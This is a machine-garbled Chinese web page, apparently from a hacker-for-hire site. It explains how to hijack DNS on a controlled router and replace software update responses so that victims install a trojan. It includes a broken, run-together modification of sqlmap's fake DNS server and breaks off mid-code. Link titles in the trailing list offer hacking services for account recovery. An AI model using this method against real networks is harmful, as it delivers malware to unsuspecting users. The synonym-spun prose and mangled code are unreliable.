绑架DNS经过流量植入木马试验

访客5年前关于黑客接单993

许多时分对方针进行浸透时一般会从web、 *** 设备、针对性垂钓这三个方向下手。假定咱们操控了方针 *** 中的一台 *** 设备,如路由器,内网用户流量会从这个当地通过咱们怎样获取其权限呢 ?
这种时分可以在路由器上抓包剖析用户流量,比方发动xshell、notepad++等软件时发送的更新恳求包,然后咱们替换软件更新的http呼应包到达植入木马意图。
剖析流量一般用tcpdump,假如只要路由器后台权限没有当地可以履行命令的话可以用DNS服务器合作HTTP署理来截获流量。

这儿就演示一下去绑架软件更新服务器到达植入木马的意图

一、布置DNS服务器
为了便利演示这儿将受害者机器上的DNS改为攻击者IP

下载sqlmap项目提取sqlmapsqlmap-stablelibrequest目录中的dns.py
履行看看作用

在用户机器上ping了一下,DNS服务器这边现已成功接纳域名解析恳求并呼应127.0.0.1
可是这个脚本中把一切域名解析恳求都呼应成127.0.0.1

需求修正一下
咱们的需求是可以正常解析域名,再对某些指定域名进行绑架。
修正后代码如下
#!/usr/bin/env python"""
Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
See the file 'doc/COPYING' for copying permission
"""import osimport reimport socketimport threadingimport timeimport dns.resolverclass DNSQuery(object):
    """
    Used for making fake DNS resolution responses based on received
    raw request
    Reference(s):
http://code.activestate.com/recipes/491264-mini-fake-dns-server/
https://code.google.com/p/marlon-tools/source/browse/tools/dnsproxy/dnsproxy.py
    """
    def __init__(self, raw):
        self._raw = raw
        self._query = ""
        type_ = (ord(raw[2]) >> 3) & 15                 # Opcode bits
        if type_ == 0:                                  # Standard query
            i = 12
            j = ord(raw[i])            while j != 0:
                self._query += raw[i + 1:i + j + 1] + '.'
                i = i + j + 1
                j = ord(raw[i])    def response(self, resolution):
        """
        Crafts raw DNS resolution response packet
        """
        retVal = ""
        if self._query:
            retVal += self._raw[:2]                                             # Transaction ID
            retVal += "x85x80"                                                # Flags (Standard query response, No error)

[1] [2] [3] [4] [5]  黑客接单网

相关文章

你好,如果我的游戏账号被盗。并且已经修改信息,

imul rax, 1920h ==> imul 0xffffffff, 1920h但是在GCC会话初始化的过程中,客户端提供的信道名称并不在服务器端的白名单中,因此攻击者将能够设置另一个名为“...

密码忘记有没有黑客可以帮找回来

Attacker互联网公开渠道出现具有非破坏性漏洞扫描功能的PoC程序Attacker密码忘记有没有黑客可以帮找回来, MailEnable软件是一种流行的邮件服务器,具有丰富的普通和管理用户功能,由...

我是一个不爱服输的人,假如去赌博输了几十块钱就

本月Apache被公布了一个提权的漏洞,并且前天在GitHub上公布出了利用脚本,这几天我负责漏洞应急这个漏洞。 #4 0x541c32 in cfrIterateGlyphs afdko/c/pu...

看我怎么发现Google出产网络SSRF缝隙获取$13337赏金

本年3月份时,我曾上报过Google的恣意html/javascript网页在线嵌入东西Caja的一个XSS缝隙,到5月份时,这个缝隙才被修正。之后,我想看看谷歌协作渠道(Google Sites)...

rar密码移除工具,哪里能找黑客,网上被骗可以找黑客么

"rmi://localhost:1099"); 试验东西: 26cid和ann_id被赋值进程2# 不一定只要msf的那个模块才能够进行浏览器进犯例如be...

手机怎么找人,在哪找黑客比较靠谱,逆向木马找黑客

http://wenzhou.acfun.tvLevel GoalPOST / HTTP/1.1a 装备文件XML隐写— —-抓包东西用fiddler为例。...